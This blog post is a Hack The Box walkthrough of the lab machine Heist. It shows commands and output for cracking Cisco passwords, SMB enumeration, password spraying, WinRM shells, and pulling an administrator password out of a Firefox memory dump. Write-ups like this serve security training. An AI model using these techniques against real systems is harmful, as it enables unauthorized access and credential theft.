Hack the Box - Heist Walk-through

Hack the Box - Heist Walk-through

This blog is related to Computer Security and Ethical hacking and does not promote hacking, cracking, software piracy or any kind of illegal activities. The blog is for informational and educational purpose and for those willing to learn about ethical hacking and penetration testing.

You shall not misuse the information to gain unauthorized access. Performing hack attempts (without permission) on computers that you do not own is illegal.

Hola Gente!

Today we are going to go over the steps I followed to get root on Heist, a machine on Hack the Box. Hack The Box is an online platform allowing you to test and advance your skills in cyber security.

Scanning and Enumeration

I kicked off my analysis by conducting a comprehensive scan of the target system using nmap default scripts:

TGT=10.129.96.157
nmap -sSVC -n -oA nmap $TGT

Key findings:

  • Port 80: HTTP running Microsoft IIS 10.0.

  • Port 135: MSRPC.

  • Port 445: Microsoft SMB service.

Visiting the web server on port 80 revealed a "Support Login Page" with an option to log in as a guest:

Logging in provided access to download a Cisco configuration file containing encrypted passwords.

Extract of the config File:

security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Decrypting Passwords

The configuration file included encrypted credentials:

  • User rout3r: Cisco Type 7 password.

  • enable secret: Cisco Type 5 hash.

Using an online Cisco Type 7 decryption tool and hashcat with the rockyou wordlist, I cracked the credentials:

hashcat -a 0 -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' rockyou.txt -O
  • rout3r: $uperP@ssword

  • Admin password: Q4)sJu\Y8qz*A3?d

  • Enable secret: stealth1agent

SMB Enumeration

Armed with the credentials, I tested SMB access using netexec:

netexec smb $TGT -u hazard -p stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent

And then tried to do a little more enumeration with netexc and smbmap

netexec smb $TGT -u hazard -p stealth1agent --shares 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Enumerated shares
SMB         10.129.96.157   445    SUPPORTDESK      Share           Permissions     Remark
SMB         10.129.96.157   445    SUPPORTDESK      -----           -----------     ------
SMB         10.129.96.157   445    SUPPORTDESK      ADMIN$                          Remote Admin
SMB         10.129.96.157   445    SUPPORTDESK      C$                              Default share
SMB         10.129.96.157   445    SUPPORTDESK      IPC$            READ            Remote IPC
smbmap -u hazard -p stealth1agent -d SupportDesk -H $TGT


[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                

[+] IP: 10.129.96.157:445    Name: 10.129.96.157           Status: Authenticated
    Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    ADMIN$                                                NO ACCESS    Remote Admin
    C$                                                    NO ACCESS    Default share
    IPC$                                                  READ ONLY    Remote IPC

I enumerated shares, noting accessible resources and potential avenues for lateral movement. A brute-force RID enumeration revealed several user accounts, including:

  • Administrator

  • Guest

  • Hazard

  • Chase

netexec smb $TGT -u hazard -p stealth1agent --rid-brute      
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      500: SUPPORTDESK\Administrator (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      501: SUPPORTDESK\Guest (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      513: SUPPORTDESK\None (SidTypeGroup)
SMB         10.129.96.157   445    SUPPORTDESK      1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1009: SUPPORTDESK\support (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1012: SUPPORTDESK\Chase (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1013: SUPPORTDESK\Jason (SidTypeUser)

I created a users.txt and passwords.txt file and ran a password spray using netexec:

netexec smb $TGT -u users.txt -p passwords.txt --continue-on-success

And Success! I found valid credentials for user Chase:

  • Username: Chase

  • Password: Q4)sJu\Y8qz*A3?d

With valid credentials, I confirmed remote access using netexec winrm:

netexec winrm $TGT -u Chase -p "Q4)sJu\Y8qz*A3?d" -X "ipconfig"

This granted me WinRM access, allowing me to execute commands on the target.

Exploitation

Using evil-winrm, I gained an interactive shell and extracted the user flag from the desktop:

evil-winrm -i $TGT -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'

Navigating through the user Desktop, I found and captured the flag. 🎉

Privilege Escalation

After capturing the user.txt flag and exploring the Desktop, I noticed that there was a todo.txt file:

PS C:\Users\Chase\Desktop>type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

After a quick run with winPEAS I noticed that there was a Firefox Creds DB file accessible.

I tried downloading which took me a while because I kept on trying and kept on getting a 0 bytes file. It turned out that I had to kill the Firefox process before attempting to download. I was finally able to download it.

I started trying to crack it, but I had a hard time finding some missing files that were required to crack the credentials.

It eventually turned out to be a 4 hour rabbit hole as this wasn't the way to escalate privileges.

The office crying Meme Generator

Well, back to square one. From Chase's To-Do list he was supposed to check the current issues. Looking at the current processes the only thing that stood out is Firefox. There's a good chance he is the one that’s using it.

Disclaimer: At this point I had to look for a hint. Forensics isn’t my strongest suit, so I didn’t think about exploring the processes’ memory.

Once I realized this was a potential avenue and learned about ProcDump.exe I uploaded and used it to dump Firefox’s Memory:

*Evil-WinRM* PS C:\Users\Chase\Documents> get-process -name firefox

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1063      63   112688     201964       2.52   6440   1 firefox

*Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -accepteula"
*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command

*Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -ma 6440 firefox.dmp"
*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command

I downloaded the firefox.dmp to my attacker machine (after several tries since they all kept timing out) for further investigation. The dump was was almost 50 MB. At this point I didn’t know what I was looking for.

Going back to the /login.php page, I checked with Burp Proxy request/response HTTP messages for a login attempt:

And noticed that the request parameter “login_password” was being passed as a POST parameter.

I then used strings and grep to look for this particular string:

strings -el firefox.dmp | grep login_password


"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

These credentials—admin@support.htb and 4dD!5}x/re8]FBuZ—looked promising!

Armed with the newly discovered credentials, I tested them for WinRM access as the Administrator:

netexec winrm $TGT -u Administrator -p '4dD!5}x/re8]FBuZ'
WINRM       10.129.96.157   5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
WINRM       10.129.96.157   5985   SUPPORTDESK      [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)

And it worked!

And then got a Shell and a Root Flag with Evil-WinRM

evil-winrm -i $TGT -u Administrator -p '4dD!5}x/re8]FBuZ'

Evil-WinRM PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt

Lessons Learned

  • Read and analyze all clues carefully (e.g., todo.txt).

  • Use get-process to identify active processes for exploitation.

  • Memory dumps often reveal sensitive data (e.g., credentials).

  • Avoid rabbit holes (DAH!); reassess your strategy if you get stuck

  • Evil-WinRM and Netexec are your friends

Call to Action!

Thanks for making it this far, If you're enjoying these and haven't joined Hack The Box yet, I invite you to sign up using my referral link. Trust me—you'll get hooked! 😊 Until next time!